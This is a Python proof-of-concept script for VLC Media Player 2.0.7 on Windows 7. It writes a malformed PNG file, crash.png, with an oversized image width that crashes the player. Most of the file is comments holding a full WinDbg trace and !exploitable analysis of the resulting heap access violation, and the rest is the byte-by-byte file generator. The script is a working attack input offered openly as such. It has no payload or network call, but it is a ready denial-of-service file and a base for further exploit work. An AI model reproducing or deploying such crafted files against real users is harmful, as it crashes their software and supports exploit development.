#!/usr/bin/python
# VLC Media Player 2.0.7 PNG Crash PoC
# Vendor Homepage: http://www.videolan.org/
# Version: 2.0.7
# Tested on: Windows 7 64-bit
# Author: Kevin Fujimoto
# Debug Information:
# Microsoft (R) Windows Debugger Version 6.12.0002.633 X86
# Copyright (c) Microsoft Corporation. All rights reserved.
# *** wait with pending attach
# Symbol search path is: SRV*g:\symbols*http://msdl.microsoft.com/download/symbols
# Executable search path is:
# ModLoad: 00400000 00425000 G:\Program Files (x86)\VideoLAN\VLC\vlc.exe
# ModLoad: 775b0000 77730000 C:\Windows\SysWOW64\ntdll.dll
# ModLoad: 750f0000 75200000 C:\Windows\syswow64\kernel32.dll
# ModLoad: 76100000 76147000 C:\Windows\syswow64\KERNELBASE.dll
# ModLoad: 623e0000 6240c000 G:\Program Files (x86)\VideoLAN\VLC\libvlc.dll
# ModLoad: 50420000 5066d000 G:\Program Files (x86)\VideoLAN\VLC\libvlccore.dll
# ModLoad: 75ab0000 75b50000 C:\Windows\syswow64\ADVAPI32.dll
# ModLoad: 76170000 7621c000 C:\Windows\syswow64\msvcrt.dll
# ModLoad: 76150000 76169000 C:\Windows\SysWOW64\sechost.dll
# ModLoad: 75210000 75300000 C:\Windows\syswow64\RPCRT4.dll
# ModLoad: 75000000 75060000 C:\Windows\syswow64\SspiCli.dll
# ModLoad: 74ff0000 74ffc000 C:\Windows\syswow64\CRYPTBASE.dll
# ModLoad: 76390000 76fda000 C:\Windows\syswow64\SHELL32.DLL
# ModLoad: 76230000 76287000 C:\Windows\syswow64\SHLWAPI.dll
# ModLoad: 75dd0000 75e60000 C:\Windows\syswow64\GDI32.dll
# ModLoad: 75ca0000 75da0000 C:\Windows\syswow64\USER32.dll
# ModLoad: 760f0000 760fa000 C:\Windows\syswow64\LPK.dll
# ModLoad: 75bf0000 75c8d000 C:\Windows\syswow64\USP10.dll
# ModLoad: 71880000 718b2000 C:\Windows\system32\WINMM.DLL
# ModLoad: 75590000 755c5000 C:\Windows\syswow64\WS2_32.dll
# ModLoad: 75300000 75306000 C:\Windows\syswow64\NSI.dll
# ModLoad: 75730000 75735000 C:\Windows\syswow64\PSAPI.DLL
# ModLoad: 75750000 75908000 C:\Windows\syswow64\WININET.DLL
# ModLoad: 75be0000 75be4000 C:\Windows\syswow64\api-ms-win-downlevel-user32-l1-1-0.dll
# ModLoad: 77580000 77585000 C:\Windows\syswow64\api-ms-win-downlevel-advapi32-l1-1-0.dll
# ModLoad: 76220000 76224000 C:\Windows\syswow64\api-ms-win-downlevel-shlwapi-l1-1-0.dll
# ModLoad: 75c90000 75c94000 C:\Windows\syswow64\api-ms-win-downlevel-version-l1-1-0.dll
# ModLoad: 74df0000 74df9000 C:\Windows\system32\version.DLL
# ModLoad: 75a40000 75a43000 C:\Windows\syswow64\api-ms-win-downlevel-normaliz-l1-1-0.dll
# ModLoad: 75740000 75743000 C:\Windows\syswow64\normaliz.DLL
# ModLoad: 75310000 75508000 C:\Windows\syswow64\iertutil.dll
# ModLoad: 75a50000 75ab0000 C:\Windows\system32\IMM32.DLL
# ModLoad: 762c0000 7638c000 C:\Windows\syswow64\MSCTF.dll
# ModLoad: 10000000 10059000 C:\Windows\SysWOW64\guard32.dll
# ModLoad: 74de0000 74de7000 C:\Windows\system32\fltlib.dll
# ModLoad: 755d0000 7572c000 C:\Windows\syswow64\ole32.dll
# ModLoad: 73d90000 73d9b000 C:\Windows\system32\profapi.dll
# ModLoad: 720f0000 72170000 C:\Windows\system32\uxtheme.dll
# ModLoad: 73cb0000 73cc3000 C:\Windows\system32\dwmapi.dll
# ModLoad: 71f50000 720ee000 C:\Windows\WinSxS\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_41e6975e2bd6f2b2\comctl32.dll
# ModLoad: 75060000 750e3000 C:\Windows\syswow64\CLBCatQ.DLL
# ModLoad: 75b50000 75bdf000 C:\Windows\syswow64\OLEAUT32.dll
# ModLoad: 61070000 610bc000 G:\Program Files (x86)\VideoLAN\VLC\plugins\access\libdshow_plugin.dll
# ModLoad: 5bf20000 5bf3c000 G:\Program Files (x86)\VideoLAN\VLC\plugins\audio_output\libaout_directx_plugin.dll
# ModLoad: 5bf00000 5bf1d000 G:\Program Files (x86)\VideoLAN\VLC\plugins\audio_output\libwaveout_plugin.dll
# ModLoad: 5b850000 5b874000 G:\Program Files (x86)\VideoLAN\VLC\plugins\video_output\libdirectx_plugin.dll
# ModLoad: 5b830000 5b849000 G:\Program Files (x86)\VideoLAN\VLC\plugins\mmxext\libmemcpymmxext_plugin.dll
# ModLoad: 5b7f0000 5b82f000 G:\Program Files (x86)\VideoLAN\VLC\plugins\access\liblibbluray_plugin.dll
# ModLoad: 59020000 59048000 G:\Program Files (x86)\VideoLAN\VLC\plugins\access\libaccess_bd_plugin.dll
# ModLoad: 57fb0000 58001000 G:\Program Files (x86)\VideoLAN\VLC\plugins\access\libdvdnav_plugin.dll
# ModLoad: 5b7d0000 5b7eb000 G:\Program Files (x86)\VideoLAN\VLC\plugins\access\libaccess_vdr_plugin.dll
# ModLoad: 5b760000 5b77b000 G:\Program Files (x86)\VideoLAN\VLC\plugins\access\libfilesystem_plugin.dll
# ModLoad: 50830000 508ac000 G:\Program Files (x86)\VideoLAN\VLC\plugins\stream_filter\libstream_filter_httplive_plugin.dll
# ModLoad: 50370000 50420000 G:\Program Files (x86)\VideoLAN\VLC\plugins\stream_filter\libstream_filter_dash_plugin.dll
# ModLoad: 59060000 5907a000 G:\Program Files (x86)\VideoLAN\VLC\plugins\access\libstream_filter_rar_plugin.dll
# ModLoad: 58040000 58065000 G:\Program Files (x86)\VideoLAN\VLC\plugins\access\libzip_plugin.dll
# ModLoad: 58020000 58039000 G:\Program Files (x86)\VideoLAN\VLC\plugins\stream_filter\libstream_filter_record_plugin.dll
# ModLoad: 57bb0000 57bda000 G:\Program Files (x86)\VideoLAN\VLC\plugins\demux\libplaylist_plugin.dll
# ModLoad: 50210000 5036f000 G:\Program Files (x86)\VideoLAN\VLC\plugins\meta_engine\libtaglib_plugin.dll
# ModLoad: 57b50000 57baa000 G:\Program Files (x86)\VideoLAN\VLC\plugins\lua\liblua_plugin.dll
# ModLoad: 500c0000 50202000 G:\Program Files (x86)\VideoLAN\VLC\plugins\misc\libxml_plugin.dll
# ModLoad: 57cd0000 57ced000 G:\Program Files (x86)\VideoLAN\VLC\plugins\control\libhotkeys_plugin.dll
# ModLoad: 57970000 57989000 G:\Program Files (x86)\VideoLAN\VLC\plugins\control\libglobalhotkeys_plugin.dll
# ModLoad: 68cf0000 697d9000 G:\Program Files (x86)\VideoLAN\VLC\plugins\gui\libqt4_plugin.dll
# ModLoad: 75510000 7558b000 C:\Windows\syswow64\COMDLG32.DLL
# ModLoad: 72230000 72281000 C:\Windows\system32\WINSPOOL.DRV
# ModLoad: 72330000 72337000 C:\Windows\system32\WSOCK32.DLL
# ModLoad: 73da0000 73db7000 C:\Windows\system32\userenv.dll
# ModLoad: 72200000 72216000 C:\Windows\system32\CRYPTSP.dll
# ModLoad: 72180000 721bb000 C:\Windows\system32\rsaenh.dll
# ModLoad: 73a60000 73a6e000 C:\Windows\system32\RpcRtRemote.dll
# ModLoad: 507d0000 50828000 G:\Program Files (x86)\VideoLAN\VLC\plugins\services_discovery\libupnp_plugin.dll
# ModLoad: 72650000 7266c000 C:\Windows\system32\IPHLPAPI.DLL
# ModLoad: 72640000 72647000 C:\Windows\system32\WINNSI.DLL
# ModLoad: 57940000 57965000 G:\Program Files (x86)\VideoLAN\VLC\plugins\services_discovery\libsap_plugin.dll
# ModLoad: 57160000 5717a000 G:\Program Files (x86)\VideoLAN\VLC\plugins\services_discovery\libpodcast_plugin.dll
# ModLoad: 56d90000 56daa000 G:\Program Files (x86)\VideoLAN\VLC\plugins\services_discovery\libmediadirs_plugin.dll
# ModLoad: 507b0000 507c9000 G:\Program Files (x86)\VideoLAN\VLC\plugins\services_discovery\libwindrive_plugin.dll
# ModLoad: 62da0000 62f0f000 C:\Windows\system32\explorerframe.dll
# ModLoad: 62d70000 62d9f000 C:\Windows\system32\DUser.dll
# ModLoad: 62cb0000 62d62000 C:\Windows\system32\DUI70.dll
# ModLoad: 730c0000 73144000 C:\Windows\WinSxS\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.7601.17514_none_ec83dffa859149af\comctl32.dll
# ModLoad: 77c00000 77c40000 G:\Program Files (x86)\VideoLAN\VLC\plugins\demux\libmp4_plugin.dll
# ModLoad: 77bd0000 77bf5000 G:\Program Files (x86)\VideoLAN\VLC\plugins\demux\libavi_plugin.dll
# ModLoad: 77ba0000 77bc2000 G:\Program Files (x86)\VideoLAN\VLC\plugins\demux\libasf_plugin.dll
# ModLoad: 77b80000 77b9b000 G:\Program Files (x86)\VideoLAN\VLC\plugins\demux\libflacsys_plugin.dll
# ModLoad: 50790000 507ab000 G:\Program Files (x86)\VideoLAN\VLC\plugins\demux\libes_plugin.dll
# ModLoad: 69830000 69857000 G:\Program Files (x86)\VideoLAN\VLC\plugins\demux\libmpc_plugin.dll
# ModLoad: 61c90000 61cab000 G:\Program Files (x86)\VideoLAN\VLC\plugins\demux\libnuv_plugin.dll
# ModLoad: 6bbb0000 6bbca000 G:\Program Files (x86)\VideoLAN\VLC\plugins\demux\libtta_plugin.dll
# ModLoad: 675f0000 6760b000 G:\Program Files (x86)\VideoLAN\VLC\plugins\demux\libwav_plugin.dll
# ModLoad: 6aaf0000 6abdb000 G:\Program Files (x86)\VideoLAN\VLC\plugins\demux\libsid_plugin.dll
# ModLoad: 69d90000 69eb8000 G:\Program Files (x86)\VideoLAN\VLC\plugins\demux\libmkv_plugin.dll
# ModLoad: 6ccd0000 6cd86000 G:\Program Files (x86)\VideoLAN\VLC\plugins\demux\liblive555_plugin.dll
# ModLoad: 6ef10000 6ef3b000 G:\Program Files (x86)\VideoLAN\VLC\plugins\demux\libogg_plugin.dll
# ModLoad: 70950000 70969000 G:\Program Files (x86)\VideoLAN\VLC\plugins\demux\libdirac_plugin.dll
# ModLoad: 644f0000 6450a000 G:\Program Files (x86)\VideoLAN\VLC\plugins\demux\libsmf_plugin.dll
# ModLoad: 64370000 6438a000 G:\Program Files (x86)\VideoLAN\VLC\plugins\demux\librawvid_plugin.dll
# ModLoad: 6c2c0000 6c2da000 G:\Program Files (x86)\VideoLAN\VLC\plugins\demux\libpva_plugin.dll
# ModLoad: 6a510000 6a53f000 G:\Program Files (x86)\VideoLAN\VLC\plugins\demux\libts_plugin.dll
# ModLoad: 67f30000 67f4a000 G:\Program Files (x86)\VideoLAN\VLC\plugins\demux\libnsv_plugin.dll
# ModLoad: 6f980000 6f999000 G:\Program Files (x86)\VideoLAN\VLC\plugins\demux\libau_plugin.dll
# ModLoad: 6a6e0000 6a74f000 G:\Program Files (x86)\VideoLAN\VLC\plugins\demux\libgme_plugin.dll
# ModLoad: 6c5e0000 6c5fa000 G:\Program Files (x86)\VideoLAN\VLC\plugins\demux\libvoc_plugin.dll
# ModLoad: 64810000 64829000 G:\Program Files (x86)\VideoLAN\VLC\plugins\demux\libxa_plugin.dll
# ModLoad: 071a0000 072ad000 G:\Program Files (x86)\VideoLAN\VLC\plugins\demux\libmod_plugin.dll
# ModLoad: 66c10000 66c2a000 G:\Program Files (x86)\VideoLAN\VLC\plugins\demux\libaiff_plugin.dll
# ModLoad: 060b0000 060cb000 G:\Program Files (x86)\VideoLAN\VLC\plugins\demux\libimage_plugin.dll
# ModLoad: 77b40000 77b7e000 G:\Program Files (x86)\VideoLAN\VLC\plugins\codec\libpng_plugin.dll
# (1e8c.1954): Access violation - code c0000005 (!!! second chance !!!)
# eax=072b0048 ebx=00ab0000 ecx=00000000 edx=00000000 esi=072b0040 edi=00ab0000
# eip=775eb6d8 esp=0658daf4 ebp=0658dbc4 iopl=0 nv up ei pl nz na po nc
# cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00010202
# ntdll!RtlpAllocateHeap+0x7fb:
# 775eb6d8 8b09 mov ecx,dword ptr [ecx] ds:002b:00000000=????????
# 0:009> !exploitable -v
# HostMachine\HostUser
# Executing Processor Architecture is x86
# Debuggee is in User Mode
# Debuggee is a live user mode debugging session on the local machine
# Event Type: Exception
# *** ERROR: Module load completed but symbols could not be loaded for G:\Program Files (x86)\VideoLAN\VLC\vlc.exe
# Exception Faulting Address: 0x0
# Second Chance Exception Type: STATUS_ACCESS_VIOLATION (0xC0000005)
# Exception Sub-Type: Read Access Violation
# Faulting Instruction:775eb6d8 mov ecx,dword ptr [ecx]
# Basic Block:
# 775eb6d8 mov ecx,dword ptr [ecx]
# Tainted Input Operands: ecx
# 775eb6da mov edx,dword ptr [edx+4]
# 775eb6dd cmp ecx,edx
# Tainted Input Operands: ecx
# 775eb6df jne ntdll!rtlpallocateheap+0x8e4 (7763af86)
# Tainted Input Operands: ZeroFlag
# Exception Hash (Major/Minor): 0x65193219.0x71557302
# Stack Trace:
# ntdll!RtlpAllocateHeap+0x7fb
# ntdll!RtlAllocateHeap+0x23a
# msvcrt!_calloc_impl+0x136
# msvcrt!_calloc_crt+0x16
# msvcrt!_getbuf+0x11
# msvcrt!_flsbuf+0x94
# msvcrt!_fputwc_nolock+0xd5
# msvcrt!fputwc+0x51
# vlc+0x5975
# vlc+0x97ee
# vlc+0x700b
# msvcrt!_wsopen_s+0x1b
# msvcrt!_unlock+0x15
# msvcrt!_iob+0x60
# ntdll!ExecuteHandler2+0x26
# Instruction Address: 0x00000000775eb6d8
# Description: Data from Faulting Address controls Branch Selection
# Short Description: TaintedDataControlsBranchSelection
# Exploitability Classification: UNKNOWN
# Recommended Bug Title: Data from Faulting Address controls Branch Selection starting at ntdll!RtlpAllocateHeap+0x00000000000007fb called from msvcrt!_calloc_impl+0x0000000000000136 (Hash=0x65193219.0x71557302)
# The data from the faulting address is later used to determine whether or not a branch is taken.
out = (
"\x89\x50\x4E\x47\x0D\x0A\x1A\x0A" # PNG signature
"\x00\x00\x00\x0D" # IHDR size
"\x49\x48\x44\x52" # IHDR chunk
"\x7F\xFF\xFF\xFF" # width
"\x00\x00\x01\x02" # height
"\x01" # bit depth
"\x03" # color type
"\x00" # compression method
"\x00" # filter method
"\x00" # interlace method
"\xBA\x1B\xD8\x84" # IHDR chunk CRC
"\x00\x00\x00\x03" # PLTE size
"\x50\x4C\x54\x45" # PLTE chunk
"\xFF" # red
"\xFF" # green
"\xFF" # blue
"\xA7\xC4\x1B\xC8" # PLTE chunk CRC
"\x00\x00\x00\x01" # tRNS size
"\x74\x52\x4E\x53" # tRNS chunk
"\x00" # alpha
"\x40\xE6\xD8\x66" # tRNS chunk CRC
"\x00\x00\x00\x01" # IDAT size
"\x49\x44\x41\x54" # IDAT chunk
"\xFF" # image data
"\x05\x3A\x92\x65" # IDAT chunk CRC
"\x00\x00\x00\x00" # IEND size
"\x49\x45\x4E\x44" # IEND chunk
"\xAE\x42\x60\x82" # IEND chunk CRC
)
print "Writing file..."
file = open('crash.png', 'wb')
file.write(out)
file.close()
print "File written!"